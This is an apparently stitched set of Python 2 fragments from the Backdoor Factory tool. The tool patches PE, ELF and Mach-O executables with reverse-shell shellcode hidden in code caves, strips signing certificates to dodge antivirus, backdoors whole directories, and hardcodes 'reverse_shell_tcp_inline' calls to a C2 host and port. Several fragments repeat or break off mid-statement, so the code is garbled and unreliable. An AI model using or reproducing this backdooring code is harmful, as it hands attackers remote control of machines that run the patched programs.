def __init__(self, FILE, OUTPUT,SHELLCODE,OBJECT_FILE):
self.FILE = FILE
self.OUTPUT = OUTPUT
self.bin_file = open(self.FILE, "r+b")
self.SHELLCODE = SHELLCODE
self.OBJECT_FILE = OBJECT_FILE
self.elfbin = elfbin(self.FILE)
def __init__(self, FILE, OUTPUT, SHELLCODE, OBJECT_FILE):
self.FILE = FILE
self.OUTPUT = OUTPUT
self.bin_file = open(self.FILE, "r+b")
self.SHELLCODE = SHELLCODE
self.OBJECT_FILE = OBJECT_FILE
self.elfbin = elfbin(self.FILE)
class bdfMain():
version = """\
2.2.1
"""
author = """\
Author: Joshua Pitts
Email: the.midnite.runr[a t]gmail<d o t>com
Twitter: @midnite_runr
"""
#ASCII ART
menu = [
"-.(`-') (`-') _ <-"
".(`-') _(`-') (`-')\n"
"__( OO) (OO ).-/ _ __( OO)"
"( (OO ).-> .-> .-> <-.(OO ) \n"
"'-'---.\ / ,---. \-,-----.'-'. ,--"
".\ .'_ (`-')----. (`-')----. ,------,) \n"
"| .-. (/ | \ /`.\ | .--./| .' /"
"'`'-..__)( OO).-. '( OO).-. '| /`. ' \n"
"| '-' `.) '-'|_.' | /_) (`-')| /)"
"| | ' |( _) | | |( _) | | || |_.' | \n"
"| /`'. |(| .-. | || |OO )| . ' |"
" | / : \| |)| | \| |)| || . .' \n"
"| '--' / | | | |(_' '--'\| |\ \|"
" '-' / ' '-' ' ' '-' '| |\ \ \n"
"`------' `--' `--' `-----'`--' '--'"
"`------' `-----' `-----' `--' '--' \n"
" (`-') _ (`-') "
" (`-') \n"
" <-. (OO ).-/ _ ( OO).-> "
" .-> <-.(OO ) .-> \n"
"(`-')-----./ ,---. \-,-----./ '._"
" (`-')----. ,------,) ,--.' ,-. \n"
"(OO|(_\---'| \ /`.\ | .--./|'--...__)"
"( OO).-. '| /`. '(`-')'.' / \n"
" / | '--. '-'|_.' | /_) (`-')`--. .--'"
"( _) | | || |_.' |(OO \ / \n"
" \_) .--'(| .-. | || |OO ) | | "
" \| |)| || . .' | / /) \n"
" `| |_) | | | |(_' '--'\ | | "
" ' '-' '| |\ \ `-/ /` \n"
" `--' `--' `--' `-----' `--' "
" `-----' `--' '--' `--' \n", "__________ "
" __ .___ \n"
"\______ \_____ ____ "
"| | __ __| _/____ ___________ \n"
" | | _/\__ \ _/ ___\|"
" |/ // __ |/ _ \ / _ \_ __ \ \n"
" | | \ / __ \\\\ \__"
"_| </ /_/ ( <_> | <_> ) | \/\n"
" |______ /(____ /\___ >"
"__|_ \____ |\____/ \____/|__| \n"
" \/ \/ \/"
" \/ \/ \n"
"___________ "
"__ \n"
"\_ _____/____ _____/"
" |_ ___________ ___.__. \n"
" | __) \__ \ _/ ___\ "
" __\/ _ \_ __ < | | \n"
" | \ / __ \\\\ \__"
"_| | ( <_> ) | \/\___ | \n"
" \___ / (____ /\___ >_"
"_| \____/|__| / ____| \n"
" \/ \/ \/ "
" \/ \n"
]
signal.signal(signal.SIGINT, signal_handler)
parser = OptionParser()
parser.add_option("-f",
"--file",
dest="FILE",
action="store",
type="string",
help="File to backdoor")
parser.add_option("-s",
"--shell",
default="show",
dest="SHELL",
action="store",
type="string",
help="Payloads that are available for use."
" Use 'show' to see payloads.")
parser.add_option("-H",
"--hostip",
default=None,
dest="HOST",
action="store",
type="string",
help="IP of the C2 for reverse connections.")
parser.add_option("-P",
"--port",
default=None,
dest="PORT",
action="store",
type="int",
help="The port to either connect back to for reverse "
"shells or to listen on for bind shells")
parser.add_option("-J",
"--cave_jumping",
dest="CAVE_JUMPING",
default=False,
action="store_true",
help="Select this options if you want to use code cave"
" jumping to further hide your shellcode in the binary.")
parser.add_option("-a",
"--add_new_section",
default=False,
dest="ADD_SECTION",
action="store_true",
help="Mandating that a new section be added to the "
"exe (better success) but less av avoidance")
parser.add_option("-U",
"--user_shellcode",
default=None,
dest="SUPPLIED_SHELLCODE",
action="store",
help="User supplied shellcode, make sure that it matches"
" the architecture that you are targeting.")
parser.add_option("-c",
"--cave",
default=False,
dest="FIND_CAVES",
action="store_true",
help="The cave flag will find code caves that "
"can be used for stashing shellcode. "
"This will print to all the code caves "
"of a specific size."
"The -l flag can be use with this setting.")
parser.add_option("-l",
"--shell_length",
default=380,
dest="SHELL_LEN",
action="store",
type="int",
help="For use with -c to help find code "
"caves of different sizes")
parser.add_option("-o",
"--output-file",
default=None,
dest="OUTPUT",
action="store",
type="string",
help="The backdoor output file")
parser.add_option("-n",
"--section",
default="sdata",
dest="NSECTION",
action="store",
type="string",
help="New section name must be "
"less than seven characters")
parser.add_option("-d",
"--directory",
dest="DIR",
action="store",
type="string",
help="This is the location of the files that "
"you want to backdoor. "
"You can make a directory of file backdooring faster by "
"forcing the attaching of a codecave "
"to the exe by using the -a setting.")
parser.add_option("-w",
"--change_access",
default=True,
dest="CHANGE_ACCESS",
action="store_false",
help="This flag changes the section that houses "
"the codecave to RWE. Sometimes this is necessary. "
"Enabled by default. If disabled, the "
"backdoor may fail.")
parser.add_option("-i",
"--injector",
default=False,
dest="INJECTOR",
action="store_true",
help="This command turns the backdoor factory in a "
"hunt and shellcode inject type of mechinism. Edit "
"the target settings in the injector module.")
parser.add_option("-u",
"--suffix",
default=".old",
dest="SUFFIX",
action="store",
type="string",
help="For use with injector, places a suffix"
" on the original file for easy recovery")
parser.add_option("-D",
"--delete_original",
dest="DELETE_ORIGINAL",
default=False,
action="store_true",
help="For use with injector module. This command"
" deletes the original file. Not for use in production "
"systems. *Author not responsible for stupid uses.*")
parser.add_option("-O",
"--disk_offset",
dest="DISK_OFFSET",
default=0,
type="int",
action="store",
help="Starting point on disk offset, in bytes. "
"Some authors want to obfuscate their on disk offset "
"to avoid reverse engineering, if you find one of those "
"files use this flag, after you find the offset.")
parser.add_option("-S",
"--support_check",
dest="SUPPORT_CHECK",
default=False,
action="store_true",
help="To determine if the file is supported by BDF prior"
" to backdooring the file. For use by itself or with "
"verbose. This check happens automatically if the "
"backdooring is attempted.")
parser.add_option(
"-M",
"--cave-miner",
dest="CAVE_MINER",
default=False,
action="store_true",
help=
"Future use, to help determine smallest shellcode possible in a PE file"
)
parser.add_option("-q",
"--no_banner",
dest="NO_BANNER",
default=False,
action="store_true",
help="Kills the banner.")
parser.add_option("-v",
"--verbose",
default=False,
dest="VERBOSE",
action="store_true",
help="For debug information output.")
parser.add_option("-T",
"--image-type",
dest="IMAGE_TYPE",
default="ALL",
type='string',
action="store",
help="ALL, x86, or x64 type binaries only. Default=ALL")
parser.add_option(
"-Z",
"--zero_cert",
dest="ZERO_CERT",
default=True,
action="store_false",
help=
"Allows for the overwriting of the pointer to the PE certificate table"
" effectively removing the certificate from the binary for all intents"
" and purposes.")
parser.add_option(
"-R",
"--runas_admin",
dest="CHECK_ADMIN",
default=False,
action="store_true",
help=
"Checks the PE binaries for \'requestedExecutionLevel level=\"highestAvailable\"\'"
". If this string is included in the binary, it must run as system/admin. Doing this "
"slows patching speed significantly.")
parser.add_option(
"-L",
"--patch_dll",
dest="PATCH_DLL",
default=True,
action="store_false",
help=
"Use this setting if you DON'T want to patch DLLs. Patches by default."
)
(options, args) = parser.parse_args()
def basicDiscovery(FILE):
testBinary = open(FILE, 'rb')
header = testBinary.read(4)
testBinary.close()
if 'MZ' in header:
return 'PE'
elif 'ELF' in header:
return 'ELF'
else:
'Only support ELF and PE file formats'
return None
if options.NO_BANNER is False:
print choice(menu)
print author
print version
time.sleep(1)
if options.DIR:
for root, subFolders, files in os.walk(options.DIR):
for _file in files:
options.FILE = os.path.join(root, _file)
if os.path.isdir(options.FILE) is True:
print "Directory found, continuing"
continue
is_supported = basicDiscovery(options.FILE)
if is_supported is "PE":
supported_file = pebin(
options.FILE, options.OUTPUT, options.SHELL,
options.NSECTION, options.DISK_OFFSET,
options.ADD_SECTION, options.CAVE_JUMPING,
options.PORT, options.HOST, options.SUPPLIED_SHELLCODE,
options.INJECTOR, options.CHANGE_ACCESS,
options.VERBOSE, options.SUPPORT_CHECK,
options.SHELL_LEN, options.FIND_CAVES, options.SUFFIX,
options.DELETE_ORIGINAL, options.CAVE_MINER,
options.IMAGE_TYPE, options.ZERO_CERT,
options.CHECK_ADMIN, options.PATCH_DLL)
elif is_supported is "ELF":
supported_file = elfbin(
options.FILE, options.OUTPUT, options.SHELL,
options.HOST, options.PORT, options.SUPPORT_CHECK,
options.FIND_CAVES, options.SHELL_LEN,
options.SUPPLIED_SHELLCODE, options.IMAGE_TYPE)
if options.SUPPORT_CHECK is True:
if os.path.isfile(options.FILE):
is_supported = False
print "file", options.FILE
try:
is_supported = supported_file.support_check()
except Exception, e:
is_supported = False
print 'Exception:', str(e), '%s' % options.FILE
if is_supported is False or is_supported is None:
print "%s is not supported." % options.FILE
#continue
else:
print "%s is supported." % options.FILE
# if supported_file.flItms['runas_admin'] is True:
# print "%s must be run as admin." % options.FILE
print "*" * 50
if options.SUPPORT_CHECK is True:
sys.exit()
print(
"You are going to backdoor the following "
"items in the %s directory:" % options.DIR)
dirlisting = os.listdir(options.DIR)
for item in dirlisting:
print " {0}".format(item)
answer = raw_input("Do you want to continue? (yes/no) ")
if 'yes' in answer.lower():
for item in dirlisting:
#print item
print "*" * 50
options.File = options.DIR + '/' + item
if os.path.isdir(options.FILE) is True:
print "Directory found, continuing"
continue
print("backdooring file %s" % item)
result = None
is_supported = basicDiscovery(options.FILE)
try:
if is_supported is "PE":
supported_file = pebin(
options.FILE, options.OUTPUT, options.SHELL,
options.NSECTION, options.DISK_OFFSET,
options.ADD_SECTION, options.CAVE_JUMPING,
options.PORT, options.HOST,
options.SUPPLIED_SHELLCODE, options.INJECTOR,
options.CHANGE_ACCESS, options.VERBOSE,
options.SUPPORT_CHECK, options.SHELL_LEN,
options.FIND_CAVES, options.SUFFIX,
options.DELETE_ORIGINAL, options.CAVE_MINER,
options.IMAGE_TYPE, options.ZERO_CERT,
options.CHECK_ADMIN, options.PATCH_DLL)
supported_file.OUTPUT = None
supported_file.output_options()
result = supported_file.patch_pe()
elif is_supported is "ELF":
supported_file = elfbin(
options.FILE, options.OUTPUT, options.SHELL,
options.HOST, options.PORT, options.SUPPORT_CHECK,
options.FIND_CAVES, options.SHELL_LEN,
options.SUPPLIED_SHELLCODE, options.IMAGE_TYPE)
supported_file.OUTPUT = None
supported_file.output_options()
result = supported_file.patch_elf()
if result is None:
print 'Not Supported. Continuing'
continue
else:
print("[*] File {0} is in backdoored "
"directory".format(supported_file.FILE))
except Exception as e:
print "DIR ERROR", str(e)
else:
print("Goodbye")
sys.exit()
#OUTPUT = output_options(options.FILE, options.OUTPUT)
is_supported = basicDiscovery(options.FILE)
if is_supported is "PE":
supported_file = pebin(
options.FILE, options.OUTPUT, options.SHELL, options.NSECTION,
options.DISK_OFFSET, options.ADD_SECTION, options.CAVE_JUMPING,
options.PORT, options.HOST, options.SUPPLIED_SHELLCODE,
options.INJECTOR, options.CHANGE_ACCESS, options.VERBOSE,
options.SUPPORT_CHECK, options.SHELL_LEN, options.FIND_CAVES,
options.SUFFIX, options.DELETE_ORIGINAL, options.CAVE_MINER,
options.IMAGE_TYPE, options.ZERO_CERT, options.CHECK_ADMIN,
options.PATCH_DLL)
elif is_supported is "ELF":
supported_file = elfbin(options.FILE, options.OUTPUT, options.SHELL,
options.HOST, options.PORT,
options.SUPPORT_CHECK, options.FIND_CAVES,
options.SHELL_LEN, options.SUPPLIED_SHELLCODE,
options.IMAGE_TYPE)
else:
print "Not supported."
sys.exit()
result = supported_file.run_this()
if result is True and options.SUPPORT_CHECK is False:
print "File {0} is in the 'backdoored' directory".format(
supported_file.FILE)
#END BDF MAIN
if __name__ == "__main__":
options.SUFFIX,
options.DELETE_ORIGINAL,
options.CAVE_MINER,
options.IMAGE_TYPE,
options.ZERO_CERT,
options.CHECK_ADMIN,
options.PATCH_DLL,
options.PATCH_METHOD
)
elif is_supported is "ELF":
supported_file = elfbin(options.FILE,
options.OUTPUT,
options.SHELL,
options.HOST,
options.PORT,
options.SUPPORT_CHECK,
options.FIND_CAVES,
options.SHELL_LEN,
options.SUPPLIED_SHELLCODE,
options.IMAGE_TYPE
)
elif is_supported is "MACHO":
supported_file = machobin(options.FILE,
options.OUTPUT,
options.SHELL,
options.HOST,
options.PORT,
options.SUPPORT_CHECK,
options.SUPPLIED_SHELLCODE,
options.FAT_PRIORITY,
PORT=port,
CAVE_JUMPING=True)
elif patchtype == 'SINGLE':
supported_file = pebin.pebin(FILE=file,
OUTPUT=aName,
SHELL=aShell,
HOST=host,
PORT=port,
CAVE_JUMPING=False)
result = supported_file.run_this()
outputfiles[aName] = result
port += 1
elif is_supported is "ELF":
supported_file = elfbin.elfbin(FILE=file, OUTPUT=None, SHELL='none')
supported_file.run_this()
for aShell in supported_file.avail_shells:
if 'cave_miner' in aShell or 'user_supplied' in aShell:
continue
aName = aShell + "." + str(host) + "." + str(port) + "." + file
print "Creating File:", aName
supported_file = elfbin.elfbin(FILE=file,
OUTPUT=aName,
SHELL=aShell,
HOST=host,
PORT=port)
result = supported_file.run_this()
outputfiles[aName] = result
elif patchtype == 'JUMP':
supported_file = pebin.pebin(FILE=file, OUTPUT=aName,
SHELL=aShell, HOST=host,
PORT=port, CAVE_JUMPING=True)
elif patchtype == 'SINGLE':
supported_file = pebin.pebin(FILE=file, OUTPUT=aName,
SHELL=aShell, HOST=host,
PORT=port, CAVE_JUMPING=False)
result = supported_file.run_this()
outputfiles[aName] = result
port += 1
elif is_supported is "ELF":
supported_file = elfbin.elfbin(FILE=file, OUTPUT=None, SHELL='none')
supported_file.run_this()
for aShell in supported_file.avail_shells:
if 'cave_miner' in aShell or 'user_supplied' in aShell:
continue
aName = aShell + "." + str(host) + "." + str(port) + "." + file
print "Creating File:", aName
supported_file = elfbin.elfbin(FILE=file, OUTPUT=aName,
SHELL=aShell, HOST=host,
PORT=port)
result = supported_file.run_this()
outputfiles[aName] = result
port += 1
class bdfMain():
version = """\
Version: 3.4.2
"""
author = """\
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
ALERT: NEW VERSION IN DEVELOPMENT
*** ONLY AVAILABLE TO SPONSORS ***
SPONSOR THE NEXT VERSION HERE: https://github.com/sponsors/secretsquirrel
Author: Joshua Pitts
Email: the.midnite.runr[-at ]gmail<d o-t>com
Twitter: @ausernamedjosh
SPONSOR THE NEXT VERSION HERE: https://github.com/sponsors/secretsquirrel
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
"""
#ASCII ART
menu = [
"-.(`-') (`-') _ <-"
".(`-') _(`-') (`-')\n"
"__( OO) (OO ).-/ _ __( OO)"
"( (OO ).-> .-> .-> <-.(OO ) \n"
"'-'---.\ / ,---. \-,-----.'-'. ,--"
".\ .'_ (`-')----. (`-')----. ,------,) \n"
"| .-. (/ | \ /`.\ | .--./| .' /"
"'`'-..__)( OO).-. '( OO).-. '| /`. ' \n"
"| '-' `.) '-'|_.' | /_) (`-')| /)"
"| | ' |( _) | | |( _) | | || |_.' | \n"
"| /`'. |(| .-. | || |OO )| . ' |"
" | / : \| |)| | \| |)| || . .' \n"
"| '--' / | | | |(_' '--'\| |\ \|"
" '-' / ' '-' ' ' '-' '| |\ \ \n"
"`------' `--' `--' `-----'`--' '--'"
"`------' `-----' `-----' `--' '--' \n"
" (`-') _ (`-') "
" (`-') \n"
" <-. (OO ).-/ _ ( OO).-> "
" .-> <-.(OO ) .-> \n"
"(`-')-----./ ,---. \-,-----./ '._"
" (`-')----. ,------,) ,--.' ,-. \n"
"(OO|(_\---'| \ /`.\ | .--./|'--...__)"
"( OO).-. '| /`. '(`-')'.' / \n"
" / | '--. '-'|_.' | /_) (`-')`--. .--'"
"( _) | | || |_.' |(OO \ / \n"
" \_) .--'(| .-. | || |OO ) | | "
" \| |)| || . .' | / /) \n"
" `| |_) | | | |(_' '--'\ | | "
" ' '-' '| |\ \ `-/ /` \n"
" `--' `--' `--' `-----' `--' "
" `-----' `--' '--' `--' \n", "__________ "
" __ .___ \n"
"\______ \_____ ____ "
"| | __ __| _/____ ___________ \n"
" | | _/\__ \ _/ ___\|"
" |/ // __ |/ _ \ / _ \_ __ \ \n"
" | | \ / __ \\\\ \__"
"_| </ /_/ ( <_> | <_> ) | \/\n"
" |______ /(____ /\___ >"
"__|_ \____ |\____/ \____/|__| \n"
" \/ \/ \/"
" \/ \/ \n"
"___________ "
"__ \n"
"\_ _____/____ _____/"
" |_ ___________ ___.__. \n"
" | __) \__ \ _/ ___\ "
" __\/ _ \_ __ < | | \n"
" | \ / __ \\\\ \__"
"_| | ( <_> ) | \/\___ | \n"
" \___ / (____ /\___ >_"
"_| \____/|__| / ____| \n"
" \/ \/ \/ "
" \/ \n", " ____ ____ ______ "
" __ \n"
" / __ )/ __ \/ ____/___ "
"______/ /_____ _______ __\n"
" / __ / / / / /_ / __ `/"
" ___/ __/ __ \/ ___/ / / /\n"
" / /_/ / /_/ / __/ / /_/ /"
" /__/ /_/ /_/ / / / /_/ /\n"
"/_____/_____/_/ \__,_/"
"\___/\__/\____/_/ \__, /\n"
" "
" /____/\n"
]
signal.signal(signal.SIGINT, signal_handler)
parser = OptionParser()
parser.add_option("-f",
"--file",
dest="FILE",
action="store",
type="string",
help="File to backdoor")
parser.add_option("-s",
"--shell",
default="show",
dest="SHELL",
action="store",
type="string",
help="Payloads that are available for use."
" Use 'show' to see payloads.")
parser.add_option("-H",
"--hostip",
default=None,
dest="HOST",
action="store",
type="string",
help="IP of the C2 for reverse connections.")
parser.add_option("-P",
"--port",
default=None,
dest="PORT",
action="store",
type="int",
help="The port to either connect back to for reverse "
"shells or to listen on for bind shells")
parser.add_option("-J",
"--cave_jumping",
dest="CAVE_JUMPING",
default=False,
action="store_true",
help="Select this options if you want to use code cave"
" jumping to further hide your shellcode in the binary.")
parser.add_option("-a",
"--add_new_section",
default=False,
dest="ADD_SECTION",
action="store_true",
help="Mandating that a new section be added to the "
"exe (better success) but less av avoidance")
parser.add_option("-U",
"--user_shellcode",
default=None,
dest="SUPPLIED_SHELLCODE",
action="store",
help="User supplied shellcode, make sure that it matches"
" the architecture that you are targeting.")
parser.add_option("-c",
"--cave",
default=False,
dest="FIND_CAVES",
action="store_true",
help="The cave flag will find code caves that "
"can be used for stashing shellcode. "
"This will print to all the code caves "
"of a specific size."
"The -l flag can be use with this setting.")
parser.add_option("-l",
"--shell_length",
default=380,
dest="SHELL_LEN",
action="store",
type="int",
help="For use with -c to help find code "
"caves of different sizes")
parser.add_option("-o",
"--output-file",
default=None,
dest="OUTPUT",
action="store",
type="string",
help="The backdoor output file")
parser.add_option("-n",
"--section",
default="sdata",
dest="NSECTION",
action="store",
type="string",
help="New section name must be "
"less than seven characters")
parser.add_option("-d",
"--directory",
dest="DIR",
action="store",
type="string",
help="This is the location of the files that "
"you want to backdoor. "
"You can make a directory of file backdooring faster by "
"forcing the attaching of a codecave "
"to the exe by using the -a setting.")
parser.add_option("-w",
"--change_access",
default=True,
dest="CHANGE_ACCESS",
action="store_false",
help="This flag changes the section that houses "
"the codecave to RWE. Sometimes this is necessary. "
"Enabled by default. If disabled, the "
"backdoor may fail.")
parser.add_option("-i",
"--injector",
default=False,
dest="INJECTOR",
action="store_true",
help="This command turns the backdoor factory in a "
"hunt and shellcode inject type of mechanism. Edit "
"the target settings in the injector module.")
parser.add_option("-u",
"--suffix",
default=".old",
dest="SUFFIX",
action="store",
type="string",
help="For use with injector, places a suffix"
" on the original file for easy recovery")
parser.add_option("-D",
"--delete_original",
dest="DELETE_ORIGINAL",
default=False,
action="store_true",
help="For use with injector module. This command"
" deletes the original file. Not for use in production "
"systems. *Author not responsible for stupid uses.*")
parser.add_option("-O",
"--disk_offset",
dest="DISK_OFFSET",
default=0,
type="int",
action="store",
help="Starting point on disk offset, in bytes. "
"Some authors want to obfuscate their on disk offset "
"to avoid reverse engineering, if you find one of those "
"files use this flag, after you find the offset.")
parser.add_option("-S",
"--support_check",
dest="SUPPORT_CHECK",
default=False,
action="store_true",
help="To determine if the file is supported by BDF prior"
" to backdooring the file. For use by itself or with "
"verbose. This check happens automatically if the "
"backdooring is attempted.")
parser.add_option(
"-M",
"--cave-miner",
dest="CAVE_MINER",
default=False,
action="store_true",
help=
"Future use, to help determine smallest shellcode possible in a PE file"
)
parser.add_option("-q",
"--no_banner",
dest="NO_BANNER",
default=False,
action="store_true",
help="Kills the banner.")
parser.add_option("-v",
"--verbose",
default=False,
dest="VERBOSE",
action="store_true",
help="For debug information output.")
parser.add_option("-T",
"--image-type",
dest="IMAGE_TYPE",
default="ALL",
type='string',
action="store",
help="ALL, x86, or x64 type binaries only. Default=ALL")
parser.add_option(
"-Z",
"--zero_cert",
dest="ZERO_CERT",
default=True,
action="store_false",
help=
"Allows for the overwriting of the pointer to the PE certificate table"
" effectively removing the certificate from the binary for all intents"
" and purposes.")
parser.add_option(
"-R",
"--runas_admin",
dest="RUNAS_ADMIN",
default=False,
action="store_true",
help="EXPERIMENTAL "
"Checks the PE binaries for \'requestedExecutionLevel level=\"highestAvailable\"\'"
". If this string is included in the binary, it must run as system/admin. If not "
"in Support Check mode it will attmept to patch highestAvailable into the manifest "
"if requestedExecutionLevel entry exists.")
parser.add_option(
"-L",
"--patch_dll",
dest="PATCH_DLL",
default=True,
action="store_false",
help=
"Use this setting if you DON'T want to patch DLLs. Patches by default."
)
parser.add_option(
"-F",
"--fat_priority",
dest="FAT_PRIORITY",
default="x64",
action="store",
help=
"For MACH-O format. If fat file, focus on which arch to patch. Default "
"is x64. To force x86 use -F x86, to force both archs use -F ALL.")
parser.add_option(
"-B",
"--beacon",
dest="BEACON",
default=15,
action="store",
type="int",
help=
"For payloads that have the ability to beacon out, set the time in secs"
)
parser.add_option(
"-m",
"--patch-method",
dest="PATCH_METHOD",
default="manual",
action="store",
type="string",
help="Patching methods for PE files, 'manual','automatic', replace "
"and onionduke")
parser.add_option("-b",
"--user_malware",
dest="SUPPLIED_BINARY",
default=None,
action="store",
help="For onionduke. Provide your desired binary.")
parser.add_option(
"-X",
"--xp_mode",
dest="XP_MODE",
default=False,
action="store_true",
help=
"Default: DO NOT support for XP legacy machines, use -X to support XP"
". By default the binary will crash on XP machines (e.g. sandboxes)")
parser.add_option(
"-A",
"--idt_in_cave",
dest="IDT_IN_CAVE",
default=False,
action="store_true",
help="EXPERIMENTAL "
"By default a new Import Directory Table is created in a new section, "
"by calling this flag it will be put in a code cave. This can cause binary "
"failure is some cases. Test on target binaries first.")
parser.add_option(
"-C",
"--code_sign",
dest="CODE_SIGN",
default=False,
action="store_true",
help=
"For those with codesigning certs wishing to sign PE binaries only. "
"Name your signing key and private key signingcert.cer and signingPrivateKey.pem "
"repectively in the certs directory it's up to you to obtain signing certs."
)
parser.add_option(
"-p",
"--preprocess",
dest="PREPROCESS",
default=False,
action="store_true",
help="To execute preprocessing scripts in the preprocess directory")
(options, args) = parser.parse_args()
def basicDiscovery(FILE):
macho_supported = [
'\xcf\xfa\xed\xfe',
'\xca\xfe\xba\xbe',
'\xce\xfa\xed\xfe',
]
testBinary = open(FILE, 'rb')
header = testBinary.read(4)
testBinary.close()
if 'MZ' in header:
return 'PE'
elif 'ELF' in header:
return 'ELF'
elif header in macho_supported:
return "MACHO"
else:
'Only support ELF, PE, and MACH-O file formats'
return None
if options.NO_BANNER is False:
print choice(menu)
print author
print version
time.sleep(.5)
else:
print "\t Backdoor Factory"
print author
print version
if options.DIR:
for root, subFolders, files in os.walk(options.DIR):
for _file in files:
options.FILE = os.path.join(root, _file)
if os.path.isdir(options.FILE) is True:
print "Directory found, continuing"
continue
is_supported = basicDiscovery(options.FILE)
if is_supported is "PE":
supported_file = pebin(
options.FILE,
options.OUTPUT,
options.SHELL,
options.NSECTION,
options.DISK_OFFSET,
options.ADD_SECTION,
options.CAVE_JUMPING,
options.PORT,
options.HOST,
options.SUPPLIED_SHELLCODE,
options.INJECTOR,
options.CHANGE_ACCESS,
options.VERBOSE,
options.SUPPORT_CHECK,
options.SHELL_LEN,
options.FIND_CAVES,
options.SUFFIX,
options.DELETE_ORIGINAL,
options.CAVE_MINER,
options.IMAGE_TYPE,
options.ZERO_CERT,
options.RUNAS_ADMIN,
options.PATCH_DLL,
options.PATCH_METHOD,
options.SUPPLIED_BINARY,
options.XP_MODE,
options.IDT_IN_CAVE,
options.CODE_SIGN,
options.PREPROCESS,
)
elif is_supported is "ELF":
supported_file = elfbin(
options.FILE,
options.OUTPUT,
options.SHELL,
options.HOST,
options.PORT,
options.SUPPORT_CHECK,
options.FIND_CAVES,
options.SHELL_LEN,
options.SUPPLIED_SHELLCODE,
options.IMAGE_TYPE,
options.PREPROCESS,
)
elif is_supported is "MACHO":
supported_file = machobin(
options.FILE,
options.OUTPUT,
options.SHELL,
options.HOST,
options.PORT,
options.SUPPORT_CHECK,
options.SUPPLIED_SHELLCODE,
options.FAT_PRIORITY,
options.BEACON,
options.PREPROCESS,
)
if options.SUPPORT_CHECK is True:
if os.path.isfile(options.FILE):
is_supported = False
print "file", options.FILE
try:
is_supported = supported_file.support_check()
except Exception, e:
is_supported = False
print 'Exception:', str(e), '%s' % options.FILE
if is_supported is False or is_supported is None:
print "%s is not supported." % options.FILE
#continue
else:
print "%s is supported." % options.FILE
# if supported_file.flItms['runas_admin'] is True:
# print "%s must be run as admin." % options.FILE
print "*" * 50
if options.SUPPORT_CHECK is True:
sys.exit()
print(
"You are going to backdoor the following "
"items in the %s directory:" % options.DIR)
dirlisting = os.listdir(options.DIR)
for item in dirlisting:
print " {0}".format(item)
answer = raw_input("Do you want to continue? (yes/no) ")
if 'yes' in answer.lower():
for item in dirlisting:
#print item
print "*" * 50
options.File = options.DIR + '/' + item
if os.path.isdir(options.FILE) is True:
print "Directory found, continuing"
continue
print("backdooring file %s" % item)
result = None
is_supported = basicDiscovery(options.FILE)
try:
if is_supported is "PE":
supported_file = pebin(
options.FILE,
options.OUTPUT,
options.SHELL,
options.NSECTION,
options.DISK_OFFSET,
options.ADD_SECTION,
options.CAVE_JUMPING,
options.PORT,
options.HOST,
options.SUPPLIED_SHELLCODE,
options.INJECTOR,
options.CHANGE_ACCESS,
options.VERBOSE,
options.SUPPORT_CHECK,
options.SHELL_LEN,
options.FIND_CAVES,
options.SUFFIX,
options.DELETE_ORIGINAL,
options.CAVE_MINER,
options.IMAGE_TYPE,
options.ZERO_CERT,
options.RUNAS_ADMIN,
options.PATCH_DLL,
options.PATCH_METHOD,
options.SUPPLIED_BINARY,
options.XP_MODE,
options.IDT_IN_CAVE,
options.CODE_SIGN,
options.PREPROCESS,
)
supported_file.OUTPUT = None
supported_file.output_options()
result = supported_file.patch_pe()
elif is_supported is "ELF":
supported_file = elfbin(
options.FILE,
options.OUTPUT,
options.SHELL,
options.HOST,
options.PORT,
options.SUPPORT_CHECK,
options.FIND_CAVES,
options.SHELL_LEN,
options.SUPPLIED_SHELLCODE,
options.IMAGE_TYPE,
options.PREPROCESS,
)
supported_file.OUTPUT = None
supported_file.output_options()
result = supported_file.patch_elf()
elif is_supported is "MACHO":
supported_file = machobin(
options.FILE,
options.OUTPUT,
options.SHELL,
options.HOST,
options.PORT,
options.SUPPORT_CHECK,
options.SUPPLIED_SHELLCODE,
options.FAT_PRIORITY,
options.BEACON,
options.PREPROCESS,
)
supported_file.OUTPUT = None
supported_file.output_options()
result = supported_file.patch_macho()
if result is None:
print 'Not Supported. Continuing'
continue
else:
print("[*] File {0} is in backdoored "
"directory".format(supported_file.FILE))
except Exception as e:
print "DIR ERROR", str(e)
else:
print("Goodbye")
sys.exit()
def patch(self):
if self.choice is "PE":
supported_file = pebin(self.FILE, #options.FILE
None, #options.OUTPUT
"reverse_shell_tcp_inline", #options.SHELL
"sdata", #options.NSECTION
0, #options.DISK_OFFSET
False, #options.ADD_SECTION
False, #options.CAVE_JUMPING
self.PORT, #options.PORT
self.HOST, #options.HOST
None, #options.SUPPLIED_SHELLCODE
False, #options.INJECTOR
True, #options.CHANGE_ACCESS
False, #options.VERBOSE
False, #options.SUPPORT_CHECK
380, #options.SHELL_LEN
False, #options.FIND_CAVES
".old", #options.SUFFIX
False, #options.DELETE_ORIGINAL
False, #options.CAVE_MINER
"ALL", #options.IMAGE_TYPE
True, #options.ZERO_CERT
False, #options.RUNAS_ADMIN
True, #options.PATCH_DLL
"automatic", #options.PATCH_METHOD
None, #options.SUPPLIED_BINARY
False, #options.XP_MODE
False, #options.IDT_IN_CAVE
False, #options.CODE_SIGN
)
elif self.choice is "ELF":
supported_file = elfbin(self.FILE,
None,
"REVERSESHELLNAME",
self.HOST,
self.PORT,
False,
False,
options.SHELL_LEN, #I must learn this
None,
"ALL"
)
elif self.choice is "MACHO":
supported_file = machobin(self.FILE,
None,
"REVERSESHELLNAME",
self.HOST,
self.PORT,
False,
None,
options.FAT_PRIORITY, #Special settings for macho files
options.BEACON
)
print ("\n\n")
result = supported_file.run_this()
print ("File {0} created !\n\n".format(supported_file.OUTPUT))
#start("PE", "Handle.exe", "192.168.1.34", 4444).patch()
#start("ELF", "Handle.exe", "192.168.1.34", "4444").patch()
#start("MACHO", "Handle.exe", "192.168.1.34", "4444").patch()
def patch(self):
if self.choice is "PE":
supported_file = pebin(
self.FILE, #options.FILE
None, #options.OUTPUT
"reverse_shell_tcp_inline", #options.SHELL
"sdata", #options.NSECTION
0, #options.DISK_OFFSET
False, #options.ADD_SECTION
False, #options.CAVE_JUMPING
self.PORT, #options.PORT
self.HOST, #options.HOST
None, #options.SUPPLIED_SHELLCODE
False, #options.INJECTOR
True, #options.CHANGE_ACCESS
False, #options.VERBOSE
False, #options.SUPPORT_CHECK
380, #options.SHELL_LEN
False, #options.FIND_CAVES
